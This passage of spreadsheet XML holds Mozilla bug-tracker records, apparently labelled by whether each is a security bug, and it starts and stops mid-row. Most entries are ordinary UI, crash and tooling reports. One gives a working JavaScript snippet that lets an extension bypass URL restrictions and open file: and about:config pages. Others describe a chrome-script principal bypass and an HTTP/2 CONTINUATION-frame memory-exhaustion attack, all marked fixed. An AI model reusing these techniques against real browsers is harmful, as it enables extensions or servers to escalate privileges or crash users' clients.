          <t>General</t>
        </is>
      </c>
      <c r="K5378" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5378" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5378" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5378" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5378" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5378" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main64+]</t>
        </is>
      </c>
      <c r="Q5378" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5378" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5378" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T5378" t="n">
        <v>1</v>
      </c>
      <c r="U5378" t="n">
        <v>0</v>
      </c>
      <c r="V5378" t="n">
        <v>5</v>
      </c>
      <c r="W5378" t="inlineStr">
        <is>
          <t>Extensions are only allowed to load some URLs (http(s), ftp:, moz-extension:,  and about:blank).
However, these restrictions can be bypassed by using pipes in the URL passed to the browser.windows.create API.
STR
1. Install any add-on (no extension permissions required).
2. Visit about:debugging and click on the Debug button at the add-on.
3. Run the following snippet:
browser.windows.create({
  url: "about:blank?|file:///tmp/|about:config"
});
Expected:
- An "about:blank" URL should be opened (maybe with some junk in its query string).
Actual:
- Three tabs are opened: "about:blank", "file:///tmp" and "about:config". The last two URLs are restricted URLs.
The crazy behavior of | will hopefully be addressed by bug 1485961 (not adding see also because that bug is public).
I will covertly plug this hole (together with bug 1486738) via (public) bug 1393570.</t>
        </is>
      </c>
      <c r="X5378" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5379">
      <c r="A5379" t="n">
        <v>1358293</v>
      </c>
      <c r="B5379" t="inlineStr">
        <is>
          <t>2017-04-20 15:31:51 -0700</t>
        </is>
      </c>
      <c r="C5379" t="inlineStr">
        <is>
          <t>[ux] error: connection failure copy,  design and illustration update</t>
        </is>
      </c>
      <c r="D5379" t="inlineStr">
        <is>
          <t>2017-08-28 08:40:15 -0700</t>
        </is>
      </c>
      <c r="E5379" t="n">
        <v>1</v>
      </c>
      <c r="F5379" t="n">
        <v>1</v>
      </c>
      <c r="G5379" t="n">
        <v>2</v>
      </c>
      <c r="H5379" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5379" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5379" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5379" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5379" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5379" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5379" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5379" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5379" t="inlineStr">
        <is>
          <t>[photon-visual][ux]</t>
        </is>
      </c>
      <c r="Q5379" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5379" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5379" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5379" t="n">
        <v>1</v>
      </c>
      <c r="U5379" t="n">
        <v>0</v>
      </c>
      <c r="V5379" t="n">
        <v>2</v>
      </c>
      <c r="W5379" t="inlineStr">
        <is>
          <t>Update page design, illustration and copy of https://mozilla.invisionapp.com/share/ZKBC94BPQ#/screens/229484287
Copy: 
&lt;title&gt;Connection Failure&lt;/title&gt;
&lt;h1&gt;Hmm. We can’t connect to that site.&lt;/h1&gt;
It appears that you are not connected to the Internet. 
Here are two things you can try:
&lt;ul&gt;&lt;li&gt;Check your network connection. 
&lt;li&gt;If you are connected but behind a firewall, check that Firefox has permission to access the Web.&lt;/ul&gt;</t>
        </is>
      </c>
      <c r="X5379" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5380">
      <c r="A5380" t="n">
        <v>848185</v>
      </c>
      <c r="B5380" t="inlineStr">
        <is>
          <t>2013-03-05 16:33:00 -0800</t>
        </is>
      </c>
      <c r="C5380" t="inlineStr">
        <is>
          <t>Swap Popular URL in Personas Plus</t>
        </is>
      </c>
      <c r="D5380" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E5380" t="n">
        <v>1</v>
      </c>
      <c r="F5380" t="n">
        <v>1</v>
      </c>
      <c r="G5380" t="n">
        <v>6</v>
      </c>
      <c r="H5380" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5380" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J5380" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K5380" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5380" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5380" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5380" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5380" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5380" t="inlineStr"/>
      <c r="Q5380" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5380" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5380" t="inlineStr">
        <is>
          <t>2013-04-04</t>
        </is>
      </c>
      <c r="T5380" t="n">
        <v>1</v>
      </c>
      <c r="U5380" t="n">
        <v>0</v>
      </c>
      <c r="V5380" t="n">
        <v>1</v>
      </c>
      <c r="W5380" t="inlineStr">
        <is>
          <t>Personas Plus uses https://www.getpersonas.com/gallery/All/Popular in it's code.  Please replace with https://addons.mozilla.org/firefox/themes/?sort=popular</t>
        </is>
      </c>
      <c r="X5380" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5381">
      <c r="A5381" t="n">
        <v>419848</v>
      </c>
      <c r="B5381" t="inlineStr">
        <is>
          <t>2008-02-27 07:41:08 -0800</t>
        </is>
      </c>
      <c r="C5381" t="inlineStr">
        <is>
          <t>XPCNativeWrapper pollution using chrome js</t>
        </is>
      </c>
      <c r="D5381" t="inlineStr">
        <is>
          <t>2008-10-13 11:22:05 -0700</t>
        </is>
      </c>
      <c r="E5381" t="n">
        <v>1</v>
      </c>
      <c r="F5381" t="n">
        <v>1</v>
      </c>
      <c r="G5381" t="n">
        <v>3</v>
      </c>
      <c r="H5381" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5381" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5381" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5381" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5381" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5381" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5381" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5381" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5381" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5381" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5381" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5381" t="inlineStr">
        <is>
          <t>mozilla1.9beta5</t>
        </is>
      </c>
      <c r="T5381" t="n">
        <v>1</v>
      </c>
      <c r="U5381" t="n">
        <v>0</v>
      </c>
      <c r="V5381" t="n">
        <v>28</v>
      </c>
      <c r="W5381" t="inlineStr">
        <is>
          <t>When content loads a script from a chrome: url by using a &lt;script&gt; element,
unlike chrome XBL binding, the script principal is the main document's
principal though the script filename is the chrome: url.  Thus, the fixes for
bug 369211, bug 387881, bug 411092 and bug 411093 can be circumvented. 
(A script that was loaded from the fastload file cannot be used for this bug's
trick, since its script principal is the system principal.)</t>
        </is>
      </c>
      <c r="X5381" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5382">
      <c r="A5382" t="n">
        <v>1470707</v>
      </c>
      <c r="B5382" t="inlineStr">
        <is>
          <t>2018-06-23 18:09:50 -0700</t>
        </is>
      </c>
      <c r="C5382" t="inlineStr">
        <is>
          <t>Remove e2e-tests from Socorro</t>
        </is>
      </c>
      <c r="D5382" t="inlineStr">
        <is>
          <t>2018-06-26 16:01:04 -0700</t>
        </is>
      </c>
      <c r="E5382" t="n">
        <v>1</v>
      </c>
      <c r="F5382" t="n">
        <v>1</v>
      </c>
      <c r="G5382" t="n">
        <v>4</v>
      </c>
      <c r="H5382" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5382" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5382" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5382" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5382" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5382" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5382" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5382" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5382" t="inlineStr"/>
      <c r="Q5382" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5382" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5382" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5382" t="n">
        <v>1</v>
      </c>
      <c r="U5382" t="n">
        <v>0</v>
      </c>
      <c r="V5382" t="n">
        <v>5</v>
      </c>
      <c r="W5382" t="inlineStr">
        <is>
          <t>We recently went through a quality risk assessment for Socorro. One of the things we determined was that the current e2e-tests suite is covering what would traditionally be covered by a frontend test suite. We've been working on bug 1468810 to experiment with reimplementing the Socorro frontend such that we would have a frontend test suite that covers this need.
Besides that, the main value that an end-to-end test suite would cover that isn't already covered by other forms of monitoring and testing that Socorro already has is noticing and catching bugs with the production server environment due to misconfiguration, connectivity issues, etc.
Socorro is a bit unique in that it's audience is primarily internal to Mozilla, and due to their reliance on Socorro for crash triage and other activities related to developing Firefox, they notice very quickly when issues like that occur and they file bugs about it pretty reliably. What this means is that an end-to-end test suite mainly provides advance warning of issues we would be notified about by users.
So, we considered:
- The webapp, which is almost completely a viewer for crash data with little to no state of it's own, has a lower risk level than the collector, as problems with the webapp don't lead to data loss. It is still important as access to crash data is critical for Firefox development.
- The end-to-end tests provide an early warning for errors that we're confident users would notice and report.
- Maintaining an end-to-end test suite at a useful quality would require a non-trivial amount of work.
Stephen Donner and I both agreed that the maintenance burden of an end-to-end test suite is not worth the early warning for the types of errors it would catch.
This bug covers two phases of removal:
1. First, we will disable the infrastructure that runs the e2e-tests, and any hooks that are in place to power this infra.
2. Once the infra is disabled, we will remove the e2e-tests directory from Socorro, as well as any related scripts and docs outside the directory.</t>
        </is>
      </c>
      <c r="X5382" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5383">
      <c r="A5383" t="n">
        <v>1380800</v>
      </c>
      <c r="B5383" t="inlineStr">
        <is>
          <t>2017-07-13 13:32:09 -0700</t>
        </is>
      </c>
      <c r="C5383" t="inlineStr">
        <is>
          <t>stylo: Crash in InvalidArrayIndex_CRASH | nsTArray_Impl&lt;T&gt;::ElementAt | mozilla::ServoCSSRuleList::GetRule</t>
        </is>
      </c>
      <c r="D5383" t="inlineStr">
        <is>
          <t>2017-07-17 13:02:07 -0700</t>
        </is>
      </c>
      <c r="E5383" t="n">
        <v>1</v>
      </c>
      <c r="F5383" t="n">
        <v>1</v>
      </c>
      <c r="G5383" t="n">
        <v>3</v>
      </c>
      <c r="H5383" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5383" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5383" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K5383" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5383" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5383" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5383" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5383" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5383" t="inlineStr"/>
      <c r="Q5383" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5383" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5383" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T5383" t="n">
        <v>1</v>
      </c>
      <c r="U5383" t="n">
        <v>0</v>
      </c>
      <c r="V5383" t="n">
        <v>6</v>
      </c>
      <c r="W5383" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-8b2d4314-ad9d-4786-96c2-1cf430170713.
=============================================================
11 crashes from 2 installations in the last 7 days. For all of them, the array is empty, and we're trying to access element 0.</t>
        </is>
      </c>
      <c r="X5383" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5384">
      <c r="A5384" t="n">
        <v>1032463</v>
      </c>
      <c r="B5384" t="inlineStr">
        <is>
          <t>2014-06-30 14:26:05 -0700</t>
        </is>
      </c>
      <c r="C5384" t="inlineStr">
        <is>
          <t>href attribute isn't set for links in the "repos" menu, so unable to open repo X directly in new tab</t>
        </is>
      </c>
      <c r="D5384" t="inlineStr">
        <is>
          <t>2015-05-20 04:25:27 -0700</t>
        </is>
      </c>
      <c r="E5384" t="n">
        <v>1</v>
      </c>
      <c r="F5384" t="n">
        <v>1</v>
      </c>
      <c r="G5384" t="n">
        <v>7</v>
      </c>
      <c r="H5384" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5384" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5384" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5384" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5384" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5384" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5384" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5384" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5384" t="inlineStr"/>
      <c r="Q5384" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5384" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5384" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5384" t="n">
        <v>1</v>
      </c>
      <c r="U5384" t="n">
        <v>0</v>
      </c>
      <c r="V5384" t="n">
        <v>9</v>
      </c>
      <c r="W5384" t="inlineStr">
        <is>
          <t>1) Go to https://treeherder.mozilla.org/
2) Open the repos menu.
3) Middle mouse click one of the non-default repos (eg fx-team) to open in a new tab (or just use the context menu copy the URL)
4) Note the resultant URL
Expected:
https://treeherder.mozilla.org/ui/#/jobs?repo=fx-team
Actual:
https://treeherder.mozilla.org/ui/
This is because the href attribute isn't set:
&lt;a href="" class="repo-link ng-binding" ng-click="changeRepo(repo.name)"&gt;fx-team&lt;/a&gt;
Marking blocking since low hanging fruit, and given the issues discussed in bug 1032220, I'm using one tab per repo - so often need to load an additional tab for a new repo - and with this bug I have to open treeherder in another tab (which opens to the default repo) and then switch to the desired repo, which takes a lot longer.</t>
        </is>
      </c>
      <c r="X5384" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5385">
      <c r="A5385" t="n">
        <v>1881183</v>
      </c>
      <c r="B5385" t="inlineStr">
        <is>
          <t>2024-02-20 19:22:47 -0800</t>
        </is>
      </c>
      <c r="C5385" t="inlineStr">
        <is>
          <t>[VU#421644] Possible OOM DOS attack via Http2 CONTINUATION frames</t>
        </is>
      </c>
      <c r="D5385" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:42 -0700</t>
        </is>
      </c>
      <c r="E5385" t="n">
        <v>1</v>
      </c>
      <c r="F5385" t="n">
        <v>1</v>
      </c>
      <c r="G5385" t="n">
        <v>3</v>
      </c>
      <c r="H5385" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5385" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5385" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K5385" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5385" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5385" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5385" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5385" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5385" t="inlineStr">
        <is>
          <t>[embargo while bug 1881164 is][necko-triaged][necko-priority-queue][adv-main125+][adv-esr115.10+]</t>
        </is>
      </c>
      <c r="Q5385" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5385" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5385" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T5385" t="n">
        <v>1</v>
      </c>
      <c r="U5385" t="n">
        <v>0</v>
      </c>
      <c r="V5385" t="n">
        <v>24</v>
      </c>
      <c r="W5385" t="inlineStr">
        <is>
          <t>There's no limit on the number of Continuation Header frames we'll append to a header, even past the maximum size.  This could be leveraged by an evil server to OOM a client.  There may be a few variations; see the linked bug.</t>
        </is>
      </c>
      <c r="X5385" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5386">
      <c r="A5386" t="n">
        <v>1184920</v>
      </c>
      <c r="B5386" t="inlineStr">
        <is>
          <t>2015-07-17 05:19:33 -0700</t>
        </is>
      </c>
      <c r="C5386" t="inlineStr">
        <is>
          <t>[Control Center] Lock is a pixel too high compared to the TP icon</t>
        </is>
      </c>
      <c r="D5386" t="inlineStr">
        <is>
          <t>2016-05-10 09:14:08 -0700</t>
        </is>
      </c>
      <c r="E5386" t="n">
        <v>1</v>
      </c>
      <c r="F5386" t="n">
        <v>1</v>
      </c>
      <c r="G5386" t="n">
        <v>2</v>
      </c>
      <c r="H5386" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5386" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5386" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5386" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5386" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5386" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5386" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5386" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5386" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q5386" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5386" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5386" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5386" t="n">
        <v>1</v>
      </c>
      <c r="U5386" t="n">
        <v>0</v>
      </c>
      <c r="V5386" t="n">
        <v>6</v>
      </c>
      <c r="W5386" t="inlineStr">
        <is>
          <t>Ash mentioned on IRC that the lock icon inside the CC is maybe a pixel too high and doesn't align with the headline as the other icons do.
https://i.imgur.com/RZzObpD.png</t>
        </is>
      </c>
      <c r="X5386" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5387">
      <c r="A5387" t="n">
        <v>1079517</v>
      </c>
      <c r="B5387" t="inlineStr">
        <is>
          <t>2014-10-07 14:26:54 -0700</t>
        </is>
      </c>
      <c r="C5387" t="inlineStr">
        <is>
          <t>[PulseGuardian] Method for querying the owner of a Pulse account</t>
        </is>
      </c>
      <c r="D5387" t="inlineStr">
        <is>
          <t>2015-03-04 19:35:58 -0800</t>
        </is>
      </c>
      <c r="E5387" t="n">
        <v>1</v>
      </c>
      <c r="F5387" t="n">
        <v>1</v>
      </c>
      <c r="G5387" t="n">
        <v>4</v>
      </c>
      <c r="H5387" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5387" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J5387" t="inlineStr">
        <is>
          <t>Pulse</t>
        </is>
      </c>
      <c r="K5387" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5387" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5387" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5387" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5387" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5387" t="inlineStr"/>
      <c r="Q5387" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5387" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5387" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5387" t="n">
        <v>1</v>
      </c>
      <c r="U5387" t="n">
        <v>0</v>
      </c>
      <c r="V5387" t="n">
        <v>15</v>
      </c>
      <c r="W5387" t="inlineStr">
        <is>
          <t>It's probably useful to be able to see who owns a given Pulse user, particularly if you are interested in one of its exchanges.  There should be a way to query for this, and/or even to list all current Pulse users and owners.  This would involve displaying email addresses, but that should be covered by Mozilla's standard privacy policy, since you'll have to log in first to see them (i.e. this ability should *not* be enabled for anonymous users).</t>
        </is>
      </c>
      <c r="X5387" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5388">
      <c r="A5388" t="n">
        <v>1355442</v>
      </c>
      <c r="B5388" t="inlineStr">
        <is>
          <t>2017-04-11 04:59:15 -0700</t>
        </is>
      </c>
      <c r="C5388" t="inlineStr">
        <is>
          <t>[UX] Need spec for compact and touch theme setting</t>
        </is>
      </c>
      <c r="D5388" t="inlineStr">
        <is>
          <t>2017-07-07 03:48:41 -0700</t>
        </is>
      </c>
      <c r="E5388" t="n">
        <v>1</v>
      </c>
      <c r="F5388" t="n">
        <v>1</v>
      </c>
      <c r="G5388" t="n">
        <v>2</v>
      </c>
      <c r="H5388" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5388" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5388" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K5388" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5388" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5388" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5388" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5388" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5388" t="inlineStr">
        <is>
          <t>[photon-visual][p1][ux]</t>
        </is>
      </c>
      <c r="Q5388" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5388" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5388" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5388" t="n">
        <v>1</v>
      </c>
      <c r="U5388" t="n">
        <v>0</v>
      </c>
      <c r="V5388" t="n">
        <v>3</v>
      </c>
      <c r="W5388" t="inlineStr">
        <is>
          <t>Where exactly will this live? Need mockup, exact wording etc., also in relation to the (currently compact) light/dark themes (for starters they'll need new names, as I assume they'd be decoupled from the compact/touch setting).</t>
        </is>
      </c>
      <c r="X5388" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5389">
      <c r="A5389" t="n">
        <v>1812611</v>
      </c>
      <c r="B5389" t="inlineStr">
        <is>
          <t>2023-01-26 07:29:43 -0800</t>
        </is>
      </c>
      <c r="C5389" t="inlineStr">
        <is>
          <t>Drag and Drop dataTransfer.files populated when some types of Image element dropped</t>
        </is>
      </c>
      <c r="D5389" t="inlineStr">
        <is>
          <t>2024-04-29 16:52:14 -0700</t>
        </is>
      </c>
      <c r="E5389" t="n">
        <v>1</v>
      </c>
      <c r="F5389" t="n">
        <v>1</v>
      </c>
      <c r="G5389" t="n">
        <v>3</v>
      </c>
      <c r="H5389" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5389" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5389" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K5389" t="inlineStr">
        <is>
          <t>Firefox 109</t>
        </is>
      </c>
      <c r="L5389" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5389" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5389" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5389" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5389" t="inlineStr"/>
      <c r="Q5389" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5389" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5389" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T5389" t="n">
        <v>1</v>
      </c>
      <c r="U5389" t="n">
        <v>0</v>
      </c>
      <c r="V5389" t="n">
        <v>23</v>
      </c>
      <c r="W5389" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Steps to reproduce:
After update from Firefox 108 to 109, a drop action between elements in a Vaadin web application no longer worked. After investigation, it appears the problem is application is interpreting drop as a FileDrop (file upload) rather than a regular DOM element drop, because the dataTransfer object is populating files array. See example jsfiddle:
https://jsfiddle.net/ksgvyhjm/2/
Issue is happening in Firefox on Linux and Windows desktops.
Actual results:
Dragging an image within the page to a drop target triggers a drop event containing files in the dataTransfer.files array, even though there is no actual usable file path. In the example, the dragged image with a jpeg source is actually reported as as having filename "image.png" and type "image/png", neither of which is actually true.
Dragging the other image on the page does not populate the files array.
Dragging a file from the OS file system does report the file information as expected.   
Expected results:
Dragging image elements within the page to the drop target within the same page should not be populating the dataTransfer.files list.</t>
        </is>
      </c>
      <c r="X5389" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5390">
      <c r="A5390" t="n">
        <v>1811464</v>
      </c>
      <c r="B5390" t="inlineStr">
        <is>
          <t>2023-01-20 03:46:12 -0800</t>
        </is>
      </c>
      <c r="C5390" t="inlineStr">
        <is>
          <t>cfi-derived-cast: Invalid downcast in SVGUtils::SetupStrokeGeometry</t>
        </is>
      </c>
      <c r="D5390" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:20 -0700</t>
        </is>
      </c>
      <c r="E5390" t="n">
        <v>1</v>
      </c>
      <c r="F5390" t="n">
        <v>1</v>
      </c>
      <c r="G5390" t="n">
        <v>3</v>
      </c>
      <c r="H5390" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5390" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5390" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5390" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5390" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5390" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5390" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5390" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5390" t="inlineStr">
        <is>
          <t>[adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q5390" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5390" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5390" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T5390" t="n">
        <v>1</v>
      </c>
      <c r="U5390" t="n">
        <v>0</v>
      </c>
      <c r="V5390" t="n">
